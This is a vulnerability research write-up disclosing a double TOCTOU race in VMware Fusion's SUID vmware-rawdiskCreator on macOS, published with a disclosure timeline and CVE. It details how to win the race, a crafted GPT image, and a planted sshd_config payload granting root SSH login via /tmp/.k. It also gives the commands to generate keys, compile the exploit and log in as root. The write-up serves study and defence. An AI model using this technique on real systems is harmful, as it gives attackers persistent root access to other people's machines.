C111000: Race Against The Virtual Machine or how a SUID binary in VMware Fusion was raced to gain root privileges on macOS

Introduction

VMware Fusion is one of the most widely deployed virtualization solutions on macOS. It allows users to run virtual machines, manage virtual disk images, and interact with raw physical disks. One of its lesser-known components is a command line utility called vmware-rawdiskCreator, which creates VMDK (Virtual Machine Disk) descriptors from physical disk devices. What makes this binary particularly interesting from a security perspective is that it is installed as SUID (setuid) root.

During this research, I identified a double TOCTOU (time-of-check to time-of-use) race condition. By exploiting two sequential race windows, an unprivileged user can redirect the binary’s root-privileged file creation operations to arbitrary directories on the filesystem.

Combined with a carefully crafted GPT disk image and a creative choice of target directory, this vulnerability achieves persistent Local Privilege Escalation as root.

Research environment (vulnerable version <= 25H2u1)

Tests were performed on macOS 26.4.1 (25E253). Take this information into consideration if you ever want to reproduce these findings on other macOS versions or VMware Fusion releases.

Quick download and installation

You can download VMware Fusion from the VMware website (which redirects to the Broadcom website).

After mounting the downloaded .dmg image, all you have to do is click the VMware icon to start the installation. Then you can launch the tool.

Target identification

During installation, VMware Fusion places several binaries inside its application bundle. Let’s have a look at the ones installed with the setuid bit.

alt-text

vmware-rawdiskCreator has the setuid bit enabled. Because the binary is owned by root and the s bit is set, it starts running with root privileges (effective UID 0), regardless of which user launches it.

alt-text

The target could easily have been identified using a tool I developed called MTM, which maps the local attack surface on macOS. It recursively walks the filesystem, identifies Mach-O binaries, and captures file metadata and code-signing entitlements.

alt-text

The binary is a universal (Fat/fat) Mach-O supporting both Intel and Apple Silicon. Let’s look at its usage.

alt-text

The create command takes a raw disk device (e.g., /dev/diskXX), a partition number, an output path, and an adapter type. It produces two output files:

<USER_DEFINED>-pt.vmdk, the partition table extent (raw MBR + GPT data from the disk).
<USER_DEFINED>.vmdk, the VMDK descriptor (a text file).

alt-text

These files are created inside a temporary working directory hierarchy that the binary builds under TMPDIR (if the environment variable is set).

Analysis

The goal of dynamic analysis is to run the binary as expected and observe what happens from a filesystem perspective. For this purpose, we can use fs_usage.

I’m using a custom patched version of fs_usage_ng, which is itself a patched version of fs_usage from Gergely Kalman.

alt-text

Since we can now see which functions and syscalls are called by the binary, we can begin the first stage of reverse engineering: identifying how the paths are constructed and determining whether they can be controlled by the user running the binary.

alt-text

We must therefore reverse the function sub_10001c9e0().

alt-text

Since it is quite a long function, I will just summarize what it does rather than show you some screenshots.

sub_10001c9e0() starts by taking a process-wide exclusive lock, then calls _geteuid() and uses the result as the security identity for the temp directory. It keeps two cached paths, selected by the second argument. If a cached path already exists for the current effective UID, it tries mkdir(path, 0700). If that fails with EEXIST, it runs lstat() and only accepts the directory if all of the following conditions are true:

It is a directory where st_uid == geteuid().
Its permissions are restricted to 0700.

Here, st.st_uid is the user ID of the owner, as returned by lstat().
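The acceptance test described above can be sketched in a few lines of C. This is only an illustration reconstructed from the summary, not the decompiled code: the function name is hypothetical, and reading "restricted to 0700" as "the permission bits are exactly 0700" is an assumption.

```c
#include <stdbool.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical helper mirroring the check summarized above.
 * Returns true only for a real directory (not a symlink) that is owned
 * by the effective UID and whose permission bits are exactly 0700. */
bool cached_dir_is_acceptable(const char *path)
{
    struct stat st;

    /* lstat() does not follow a symlink in the final path component. */
    if (lstat(path, &st) != 0)
        return false;
    if (!S_ISDIR(st.st_mode))
        return false;
    if (st.st_uid != geteuid())
        return false;
    /* Assumption: no group/other bits may be set. */
    return (st.st_mode & 0777) == 0700;
}
```

Note that a check of this kind only describes the directory entry at the instant of the lstat() call. Nothing ties the result to the entry that later path lookups will resolve.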

If there is no usable cached directory, it searches for a base temp directory. The first argument controls whether it first consults the preference key tmpDirectory (_Preference_GetString()). After that it tries _getenv("TMPDIR"), then hardcoded candidates (including /var/tmp/ and /tmp), then the current working directory via _File_Cwd(), and then one more built-in fallback.

Every candidate is only screened with _FileIsWritableDir().

alt-text

Playing with `getenv()`

As shown, we can control the path of the temporary directory by manipulating the TMPDIR environment variable. Let’s see what happens with fs_usage when this variable is under our control.

alt-text

Binary’s behavior

When invoked using create, the binary performs the following operations (while running with effective UID 0, root privileges):

1. mkdir TMPDIR/vmware-root/ (mode 0700).
2. mkdir TMPDIR/vmware-root/rawdiskCreator<pid>/ (mode 0700).
3. open TMPDIR/vmware-root/rawdiskCreator<pid>/<USER_DEFINED>-pt.vmdk (O_CREAT).
4. write raw MBR + GPT data from the source disk.
5. open TMPDIR/vmware-root/rawdiskCreator<pid>/<USER_DEFINED>.vmdk (O_CREAT).
6. write VMDK descriptor text.
7. On error or completion, it unlinks the files and removes the directories with rmdir.

When looking at the execution flow, I realized that several properties of this behavior were relevant to mounting a TOCTOU attack.

`TMPDIR` environment variable is user-controlled

The binary inherits TMPDIR from the calling process and uses it as the base for its temporary directory hierarchy. On macOS, TMPDIR typically points to a per user directory under /private/var/folders/, but an attacker can set it to any path before invoking the binary.

`O_NOFOLLOW` on source files

While the binary does use O_NOFOLLOW when creating destination files (after dropping privileges for the final VMDK output), it does not use this flag for the intermediate source files created in steps 3 and 5 above. This means that if any component of the path is a symlink, the kernel will happily follow it.

The O_NOFOLLOW flag causes the open to fail if the last component of the path is a symbolic link. Its absence here is the root cause of the vulnerability.

Files are created as `root`

Because the binary’s effective UID is 0 at the time of file creation, the resulting files are owned by root with mode 0600. This is a powerful primitive, as we can create root-owned files in any directory where root has write access (with the exception of directories protected by SIP).

Cleanup on exit

The binary removes its temporary files and directories before exiting. This means that after a successful race, we must freeze the binary (via SIGSTOP) before it can run its cleanup routine, or the planted files will be deleted.

Understanding the TOCTOU vulnerability

The vulnerability is a classic TOCTOU race condition. The binary performs directory creation and file creation as separate, non-atomic operations. Between these operations, an attacker can substitute a directory with a symlink, causing the binary’s subsequent open() calls to follow the symlink to a location of the attacker’s choosing.

The attack consists of two sequential TOCTOU swaps:

alt-text

After both swaps succeed, the path that the binary resolves becomes:

alt-text

The binary creates <USER_DEFINED>-pt.vmdk as root in what it believes is its private temp directory, but the file actually lands in /etc/ssh/sshd_config.d/.

Enlarging your race window

TOCTOU races are known for being extremely time sensitive. The interval between the creation of the directory and the creation of the file can be as short as a few microseconds. To ensure I win the race reliably, I used two techniques.

Path-padding symlink chains

Instead of pointing TMPDIR directly at a temporary directory, we create a chain of 20 symlinks, each stuffed with ./ and d/../ path components.

tmpdir/s1 -> ././d/../././d/../...s2
tmpdir/s2 -> ././d/../././d/../...s3
...
tmpdir/s20 -> ././d/../././d/../...     (resolves to tmpdir itself)
tmpdir/d   -> (real directory, needed for "d/../" to resolve)

In XNU, the main pathname resolution function is namei(struct nameidata *ndp). namei() converts a pathname into the resolved vnode/inode, and its comment outlines the lookup flow: choose the starting directory, then repeatedly call lookup on path components. At a lower level, the resolver is lookup(), which is called from inside namei().

We then set TMPDIR to <tmpdir>/s1. When the binary resolves this path, the function namei() must traverse thousands of path components across 20 symlink hops. This wastes tens of microseconds of CPU time in kernel space, dramatically widening the race window.
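To get a feel for where "thousands of path components" comes from, the sketch below counts the components in a padded target. Both helper names are hypothetical, and the buffer capacity passed in stands for whatever limit applies to a symlink target on the system, which is an assumption the caller has to supply.

```c
#include <stddef.h>
#include <string.h>

/* Counts the non-empty components of a path, i.e. the names that have
 * to be looked up one by one ("." and ".." included). */
size_t count_components(const char *path)
{
    size_t n = 0;
    while (*path) {
        while (*path == '/')
            path++;
        if (!*path)
            break;
        n++;
        while (*path && *path != '/')
            path++;
    }
    return n;
}

/* Fills `out` with as many "././d/../" units as fit in `cap` bytes,
 * followed by `next` (the name of the following link in the chain).
 * Returns the number of padding units written. */
size_t build_padded_target(char *out, size_t cap, const char *next)
{
    static const char unit[] = "././d/../";
    const size_t ulen = sizeof unit - 1;
    const size_t next_len = strlen(next);
    size_t used = 0, units = 0;

    if (cap < next_len + 1) {
        if (cap > 0)
            out[0] = '\0';
        return 0;
    }
    while (used + ulen + next_len + 1 <= cap) {
        memcpy(out + used, unit, ulen);
        used += ulen;
        units++;
    }
    memcpy(out + used, next, next_len + 1); /* copies the trailing NUL */
    return units;
}
```

Each unit contributes four components. Assuming a 1024-byte target, about 113 units fit per link, which gives roughly 450 components per hop and around 9,000 across a 20-link chain.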

This technique is inspired by the path padding approach described by Borisov, Johnson, Sastry, and Wagner in “Fixing Races for Fun and Profit: How to Abuse atime” (USENIX Security 2005). The idea is that forcing the kernel to perform long path resolution slows down the victim process without requiring any special privileges.

The resulting layout closely resembles the diagram from that USENIX Security 2005 paper.

alt-text

The total number of symlink hops must stay within macOS’s MAXSYMLINKS (from XNU kernel source bsd/sys/param.h) limit.

alt-text

Our directory structure is as follows:

20 (chain) + 1 (vmware-root) + 1 (rawdiskCreator<pid>) = 22 hops

This fits within the 32-hop limit.

CPU pressure

In addition to path padding, we spawn background threads that perform cache thrashing memory writes. These threads compete with the vulnerable binary for CPU time, causing it to be preempted more frequently and further stretching the duration of the race window.

One pressure thread is spawned per logical CPU. The combination of path padding and CPU pressure makes the race extremely reliable. During my tests, it was consistently won within 1 to 2 attempts (iterations of the while loop) on my host and 25 to 28 attempts within a VM.

Stage 1: `RENAME_SWAP` on vmware-root

The first race targets the vmware-root directory. After the binary creates TMPDIR/vmware-root/ as a real directory, we need to replace it with a symlink to our staging directory.

We monitor the temp directory using fstatat(), waiting for vmware-root to appear.

The key operation here is renameatx_np() with the RENAME_SWAP flag. This is a macOS specific system call that atomically swaps two directory entries. We precreate a symlink called .swap_sym pointing to our staging directory, then swap it with vmware-root in a single atomic operation.

renameatx_np(2) with RENAME_SWAP performs an atomic exchange of two filesystem entries. This is strictly better than a non-atomic rename + symlink sequence, because it eliminates the brief window where neither entry exists. However, both entries must be on the same filesystem.

If RENAME_SWAP fails (for example, if the temp directory and the swap target are on different filesystems), we fall back to a non-atomic rename + symlink sequence.

After the swap succeeds, the binary’s vmware-root entry now points to our staging directory. Any subsequent path resolution through vmware-root lands under our control.

Stage 2: `rmdir` + `symlink` on rawdiskCreator<pid>/

After Stage 1, the binary creates rawdiskCreator<pid>/ inside what is now our staging directory. We need to replace this directory with a symlink to the final target /etc/ssh/sshd_config.d/.

The process is similar to Stage 1, but we use rmdir() + symlink() instead of RENAME_SWAP, because the directory to be replaced is freshly created and empty.

Before resuming the binary, we set up a kqueue watch on the target directory using EVFILT_VNODE with NOTE_WRITE. This mechanism allows us to be notified the instant a new file appears in the target directory.

kqueue(2) is the macOS kernel event notification interface. EVFILT_VNODE with NOTE_WRITE fires when the contents of a directory change (e.g., a file is created or deleted). This is significantly faster than polling with readdir(), allowing us to freeze the binary almost immediately after it creates the first file.

When the binary resumes and creates <USER_DEFINED>-pt.vmdk, the full path resolution proceeds as follows:

alt-text

The kqueue fires, and we immediately SIGSTOP the binary again. This is critical as the binary creates <USER_DEFINED>-pt.vmdk first, then <USER_DEFINED>.vmdk. By freezing it after the first file is created, but before the second, we ensure that only <USER_DEFINED>-pt.vmdk lands in the target directory.

Crafting the payload

The planted file <USER_DEFINED>-pt.vmdk contains the raw MBR (Master Boot Record) and GPT (GUID Partition Table) data from the source disk. Since we craft the source disk image ourselves, we have full control over its contents.

MBR boot code

According to the UEFI specification, the first 440 bytes of the MBR are reserved for boot code. On GPT disks, this area is unused which gives us 440 bytes of fully controlled payload at the very beginning of the -pt.vmdk file.

On a GPT disk, the BootCode field in the first sector is not used because UEFI firmware does not execute sector 0. Instead of running raw disk code like BIOS does with MBR, UEFI reads the GPT directly and loads a bootloader from the EFI System Partition.

alt-text

Building a valid GPT image

We cannot simply dump arbitrary data into a file and pass it to the binary. The vmware-rawdiskCreator binary validates that the source disk contains a valid GPT partition table with at least one partition. We must construct a compliant GPT image.

Our image builder creates a minimal 10 MB disk image with:

A protective MBR with our payload in the boot code area.
A primary GPT header (sector 1) with valid checksums.
A partition entry array (sectors 2-33) containing one Apple HFS+ partition.
A backup GPT header and entry array at the end of the image.

The partition type GUID is set to Apple HFS/HFS+, which the binary accepts for partition mode operation. The image is then attached as a virtual disk device using hdiutil.
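For reference, the header that has to be filled in follows the layout from the UEFI specification. The struct below is a sketch of that layout with illustrative field names, and the helper that derives the backup header is hypothetical. It is not taken from the exploit source.

```c
#include <stddef.h>
#include <stdint.h>

/* On-disk GPT header (little-endian fields). Field names are
 * illustrative; the packed attribute is a GCC/Clang extension. */
struct gpt_header {
    uint8_t  signature[8];          /* "EFI PART" */
    uint32_t revision;
    uint32_t header_size;           /* 92 for the standard header */
    uint32_t header_crc32;          /* computed with this field set to 0 */
    uint32_t reserved;
    uint64_t my_lba;
    uint64_t alternate_lba;
    uint64_t first_usable_lba;
    uint64_t last_usable_lba;
    uint8_t  disk_guid[16];
    uint64_t partition_entry_lba;
    uint32_t num_partition_entries;
    uint32_t partition_entry_size;
    uint32_t partition_array_crc32;
} __attribute__((packed));

_Static_assert(sizeof(struct gpt_header) == 92,
               "GPT header must be 92 bytes");

/* Hypothetical helper: derives the backup header from the primary one.
 * The two LBA fields are swapped and the entry array location changes;
 * the CRC is cleared because it has to be recomputed afterwards. */
struct gpt_header gpt_backup_from_primary(struct gpt_header primary,
                                          uint64_t backup_entries_lba)
{
    struct gpt_header b = primary;
    b.my_lba = primary.alternate_lba;
    b.alternate_lba = primary.my_lba;
    b.partition_entry_lba = backup_entries_lba;
    b.header_crc32 = 0;
    return b;
}
```

Because the primary and backup headers differ in these fields, their CRC32 values differ as well, even though both carry the same disk GUID.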

Command:

hdiutil attach -nomount payload.img

Output:

/dev/diskXX          GUID_partition_scheme
/dev/diskXXs1        Apple_HFS

This /dev/diskXX device is passed to vmware-rawdiskCreator as the source disk.

Eliminating newline (`0x0A`) bytes from GPT structures

For reasons that will become clear in the next section, the planted -pt.vmdk file must be parseable as a valid sshd configuration file. The configuration format we target uses # to denote comments. Our strategy is as follows:

The payload (first 440 bytes) contains valid configuration directives, and ends with \n#.
The # at the end of the payload makes everything that follows a comment.
If there are no more 0x0A (newline) bytes in the remaining ~34KB of GPT data, the entire binary content forms a single, very long comment line.

Most GPT fields are naturally free of 0x0A.
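The property we are after can be stated as a small predicate: the file contains exactly as many newlines as there are directive lines, and the byte right after the last newline is #. The function below is a hypothetical checker written for illustration. It is not part of the exploit source.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical checker: returns true when `file` consists of
 * `directive_lines` newline-terminated lines followed by one final
 * line that starts with '#' and contains no further 0x0A byte. */
bool binary_tail_is_comment(const uint8_t *file, size_t len,
                            size_t directive_lines)
{
    size_t newlines = 0, last = 0;

    for (size_t i = 0; i < len; i++) {
        if (file[i] == 0x0A) {
            newlines++;
            last = i;
        }
    }
    /* Any extra newline would start a new, non-comment line. */
    if (newlines == 0 || newlines != directive_lines)
        return false;
    return last + 1 < len && file[last + 1] == '#';
}
```

A single stray 0x0A anywhere in the GPT data changes the newline count and makes the predicate fail, which is why every field has to be checked.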

The problematic fields are the CRC32 checksums. These are computed over other fields and cannot be directly set to arbitrary values. However, we can influence them indirectly by modifying fields that contribute to the checksum but have no semantic significance to the binary (we can brute-force two GUID fields).

Partition unique GUID (16 bytes)

This is a random identifier for the partition. We iterate through candidate values, computing the CRC32 of the full 128 entry partition array for each, until we find one where the resulting CRC contains no 0x0A byte. Each candidate byte is deterministically derived and clamped away from 0x0A.
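A minimal sketch of such a search is shown below. The CRC routine is the standard reflected CRC-32 that GPT uses. The search function name and the way candidate bytes are derived from the attempt counter are assumptions made for illustration, not the derivation used in the actual exploit.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Standard reflected CRC-32 (polynomial 0xEDB88320), bitwise variant. */
uint32_t crc32_ieee(const uint8_t *p, size_t n)
{
    uint32_t crc = 0xFFFFFFFFu;
    for (size_t i = 0; i < n; i++) {
        crc ^= p[i];
        for (int b = 0; b < 8; b++)
            crc = (crc >> 1) ^ (0xEDB88320u & (0u - (crc & 1u)));
    }
    return ~crc;
}

/* True if any of the four bytes of `v` equals `needle`. */
bool u32_contains_byte(uint32_t v, uint8_t needle)
{
    for (int i = 0; i < 4; i++)
        if (((v >> (8 * i)) & 0xFFu) == needle)
            return true;
    return false;
}

/* Rewrites the 16-byte field at buf+off until crc32(buf) contains no
 * 0x0A byte. Returns the number of attempts used, or 0 on failure.
 * The candidate derivation is an illustrative assumption. */
unsigned search_guid_without_newline_crc(uint8_t *buf, size_t len,
                                         size_t off, unsigned max_attempts)
{
    if (off > len || len - off < 16)
        return 0;
    for (unsigned a = 1; a <= max_attempts; a++) {
        for (size_t i = 0; i < 16; i++) {
            uint8_t c = (uint8_t)(a * 31u + i * 17u + 0x41u);
            if (c == 0x0A)
                c = 0x0B; /* clamp the GUID byte itself away from 0x0A */
            buf[off + i] = c;
        }
        if (!u32_contains_byte(crc32_ieee(buf, len), 0x0A))
            return a;
    }
    return 0;
}
```

For the partition array, `buf` would be the full 128-entry array and `off` the position of the unique GUID, which sits 16 bytes into the first 128-byte entry.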

Disk GUID (16 bytes)

This identifies the disk itself. We iterate similarly, but this time we must satisfy two constraints simultaneously. The primary header CRC and the backup header CRC must both be free of 0x0A. The two headers have different LBA values (the backup header’s myLBA and alternateLBA are swapped), so their CRCs differ.

In practice, both searches converge in 1 to 3 attempts. After bruteforcing, a final scan verifies that zero 0x0A bytes remain anywhere in the GPT structures.
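A rough estimate shows why so few attempts are needed. It assumes that the four bytes of a CRC32 behave like independent, uniformly distributed bytes, which is a modeling assumption rather than a measured property:

```latex
P(\text{one CRC32 has no } \texttt{0x0A})
  = \left(\tfrac{255}{256}\right)^{4} \approx 0.984
\qquad
P(\text{two CRC32s both have no } \texttt{0x0A})
  \approx \left(\tfrac{255}{256}\right)^{8} \approx 0.969
```

Under that assumption, the expected number of candidates is about 1/0.984 ≈ 1.02 for the partition array and 1/0.969 ≈ 1.03 for the pair of headers, so most runs succeed on the first try.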

Finding the right target or why sudoers.d fails and sshd_config.d works

The exploit gives us the ability to create a root owned file in any directory (excluding those protected by SIP). The planted file is always named <USER_DEFINED>-pt.vmdk (derived from the output basename and the -pt.vmdk suffix hardcoded in the binary). The key question is, “Where should we plant this file to achieve privilege escalation?”.

sudoers.d dead end

The obvious first target is /etc/sudoers.d/. On macOS, /etc/sudoers includes this directive:

File: /etc/sudoers

...
## Read drop-in files from /private/etc/sudoers.d
## (the '#' here does not indicate a comment)
#includedir /private/etc/sudoers.d

Despite the # prefix, this is not a comment. The #includedir directive tells sudo to read all configuration files from the specified directory. If we could plant a file containing %staff ALL=(ALL) NOPASSWD: ALL in /etc/sudoers.d/, any member of the staff group (which includes all local users on macOS) would gain passwordless sudo access.

However, sudo applies a filename filter to files read via #includedir. According to the sudoers(5) manual page, when sudo reads files via #includedir, it skips any file whose name ends in ~ or contains a . character.

alt-text

Our file suffix is -pt.vmdk. It contains a ., so sudo will unconditionally skip it.

Since the filename is derived from the binary’s internal logic (it appends .vmdk and -pt.vmdk to the output path argument), there is no way to avoid the dots.

I explored several workarounds:

LaunchDaemons: /Library/LaunchDaemons/ requires a .plist extension. launchctl load returns “Input/output error” for .vmdk files.
Periodic scripts: periodic(8) checks executability. Our file has mode 0600 (no execute bit), and we cannot chmod it.
PAM: /etc/pam.d/ requires files named after the service (e.g., sudo, login). A file named -pt.vmdk does not match any service.
cron.d: Does not exist by default on macOS.
paths.d: path_helper runs as the calling user, which cannot read our 0600 file. And even when readable, paths.d entries are appended (not prepended) to PATH, preventing command shadowing.

The sshd_config.d breakthrough

After exhausting the obvious targets, I examined how macOS configures OpenSSH. The file /etc/ssh/sshd_config contains:

alt-text

This is a critical difference from sudo’s #includedir. OpenSSH’s Include directive uses standard glob(3) pattern matching. The pattern * matches all non hidden files regardless of their extension or the presence of dots in their filename. Our -pt.vmdk file matches this glob and will be included.

The distinction is subtle but critical. sudo’s #includedir applies a custom filename filter (rejecting files with .), while OpenSSH’s Include uses the system’s glob(3) function, which has no such filter. This difference is what makes sshd_config.d a viable target when sudoers.d is not.
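The two behaviors can be compared side by side with a short sketch. The first function restates the rule quoted from sudoers(5). The second approximates how glob(3) treats the pattern * for a single directory entry by calling fnmatch(3) with FNM_PERIOD. Both function names, and the example basename disk used in the note below, are hypothetical.

```c
#include <fnmatch.h>
#include <stdbool.h>
#include <string.h>

/* Rule quoted from sudoers(5): skip names that end in '~' or that
 * contain a '.' character. */
bool sudo_includedir_skips(const char *name)
{
    size_t n = strlen(name);
    return (n > 0 && name[n - 1] == '~') || strchr(name, '.') != NULL;
}

/* Approximation of glob(3) with the pattern "*": FNM_PERIOD keeps a
 * leading '.' from being matched by the wildcard, so hidden files are
 * excluded while every other name matches. */
bool glob_star_includes(const char *name)
{
    return fnmatch("*", name, FNM_PERIOD) == 0;
}
```

For a name such as disk-pt.vmdk, sudo_includedir_skips() returns true while glob_star_includes() also returns true, so the same file is ignored by sudo and picked up by an Include pattern ending in *.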

Furthermore, the Include directive appears at the top of sshd_config, before all other options. Since OpenSSH uses first-match-wins semantics, our directives take precedence. sshd_config uses # for comments, just like sudoers, so our \n# trick works identically. sshd runs as root and can read the 0600 file.

I verified that the existing file in the include directory (100-macos.conf) does not conflict with our payload:

alt-text

None of these options overlap with our payload, as our payload consists of:

PermitRootLogin yes
AuthorizedKeysCommand /bin/cat /tmp/.k
AuthorizedKeysCommandUser root
#

When the binary writes this into the MBR boot code area and the rest of the GPT data follows, the resulting <USER_DEFINED>-pt.vmdk file looks like:

Line 1: PermitRootLogin yes                     (valid sshd_config directive)
Line 2: AuthorizedKeysCommand /bin/cat /tmp/.k  (valid sshd_config directive)
Line 3: AuthorizedKeysCommandUser root          (valid sshd_config directive)
Line 4: #<34 KB of binary GPT data>             (comment with no newlines to EOF)

Each directive serves a specific purpose:

PermitRootLogin yes, allows SSH login as the root user.
AuthorizedKeysCommand /bin/cat /tmp/.k, tells sshd to execute /bin/cat /tmp/.k to obtain authorized public keys for any connecting user. The /bin/cat binary satisfies sshd’s requirement as the command is owned by root and not writable by group or others. This approach is additive. It does not override AuthorizedKeysFile, so existing SSH authentication for other users remains unaffected.
AuthorizedKeysCommandUser root, specifies that the command should run as root.

The file /tmp/.k needs to be created before running the exploit, as it will contain our Ed25519 public key. But first, I verified that sshd accepts this configuration by running sshd in test mode.

Command:

/usr/sbin/sshd -T -f /tmp/test_main.conf -h /tmp/test_hostkey | grep -E 'permit|authorized'

Output:

permitrootlogin yes
authorizedkeyscommand /bin/cat /tmp/.k
authorizedkeyscommanduser root

All three directives are active, and sshd exits with code 0, confirming that the binary GPT data after # is correctly treated as a comment.

Exploitation and proof of concept

Prerequisites

The exploit requires SSH (Remote Login) enabled on the target system (or patience for it to be enabled).

Creation of cryptographic keys

Before running, we prepare the SSH keys that will be used for root authentication:

ssh-keygen -t ed25519 -f /tmp/.kp -N ""
cp /tmp/.kp.pub /tmp/.k

Compiling the exploit

cc -O2 -lpthread -o exploit exploit.c

Running the exploit

File: exploit.c (sha256: 7e56de8b1fb461f4e67559a8d89b7368246156fe0448717da4514aa2183718a9)

/*
 *                         /\  .-----.  /\
 *                        //\\/       \//\\
 *                        |/\|    0    |/\|
 *                        //\\\;-----;///\\
 *                       //  \/   .   \/  \\
 *                      (| ,-_|coiffeur|_-, |)
 *                        //`__\.-.-./__`\\
 *                       // /.-(     )-.\ \\
 *                      (\ |)   '   '   (| /)
 *                       ` (|           |) `
 *                         \)           (/
 * Title:   VMware Fusion TOCTOU LPE as root (macOS)
 * Author:  Mathieu Farrell aka @Coiffeur0x90
 * Summary: Exploits a double TOCTOU race condition in the suid root binary
 *          vmware-rawdiskCreator to write an attacker controlled, root owned
 *          file into /etc/ssh/sshd_config.d/. The planted file configures
 *          sshd to accept root SSH login using a attacker supplied public key,
 *          achieving persistent local privilege escalation.
...

alt-text

Gaining root access

Once sshd is running (if Remote Login is enabled, or after the next reboot on systems where it is enabled), the attacker can SSH in as root:

ssh -i /tmp/.kp root@localhost

The planted configuration causes sshd to run /bin/cat /tmp/.k as the AuthorizedKeysCommand, which returns the attacker’s public key. SSH public key authentication succeeds, and the attacker obtains a root shell.

Persistence

The planted file survives reboots. It will be included by sshd on every startup via the Include /etc/ssh/sshd_config.d/* directive. The attacker maintains root SSH access as long as the file remains in /etc/ssh/sshd_config.d/ and the key file exists at /tmp/.k.

The <USER_DEFINED>.vmdk problem

It is worth mentioning a subtlety in the exploit’s race against the binary’s file creation sequence. The binary creates two files:

<USER_DEFINED>-pt.vmdk, the partition table (our payload).
<USER_DEFINED>.vmdk, the VMDK descriptor (a text file with VMware-specific syntax).

If <USER_DEFINED>.vmdk is also created in /etc/ssh/sshd_config.d/, it will be included by sshd’s glob and parsed. This file begins with # Disk DescriptorFile (a comment), but subsequent lines like version=1 are not valid sshd_config keywords. sshd may treat unknown keywords as fatal errors and refuse to start.

This is why the kqueue-based freeze mechanism in Stage 2 is critical. By detecting the first file creation (the NOTE_WRITE event on the target directory) and immediately sending SIGSTOP, we freeze the binary after <USER_DEFINED>-pt.vmdk is created but before <USER_DEFINED>.vmdk is written. In all of my test runs, only <USER_DEFINED>-pt.vmdk landed in the target directory.

Conclusion

This research demonstrates how a TOCTOU race condition in a setuid binary can be escalated to full root access on macOS. The key ingredients of this recipe were:

A SUID root binary that follows symlinks when creating files in a user-controlled directory hierarchy.
Path-padding symlink chains to widen the race window to a reliably winnable size.
An atomic directory swap (RENAME_SWAP) for the first race, and a kqueue-triggered freeze for precise timing control.
A crafted GPT disk image with all 0x0A bytes brute forced out of the CRC32 checksums, making the binary partition table data invisible to line oriented config parsers.
The subtle difference between sudo’s #includedir (which filters filenames containing .) and OpenSSH’s Include (which uses unrestricted glob(3) matching), making sshd_config.d a viable target.

Thanks for taking the time to read this article.

Timeline

2026 March 31: Discovered the vulnerability in my hotel room after the second day of attending Csaba Fitzl & Gergely Kalman’s training session at Zer0con.
2026 April 12: First email sent to security@vmware.com.
2026 April 12: Second email sent to vmware.psirt@broadcom.com.
2026 April 12: Start of the investigation by VMware team.
2026 April 25: Vulnerability confirmed by VMware team.
2026 April 25: I declined to join the private Bug Bounty program and therefore declined to sign the associated NDA.
2026 April 29: VMware informed me that the process now qualifies as a public disclosure and that they will keep me updated on the rest of the process.
2026 May 11: VMware informed me that the advisory will be published.
2026 May 14: The advisory has been published as VMSA-2026-0003/CVE-2026-41702.
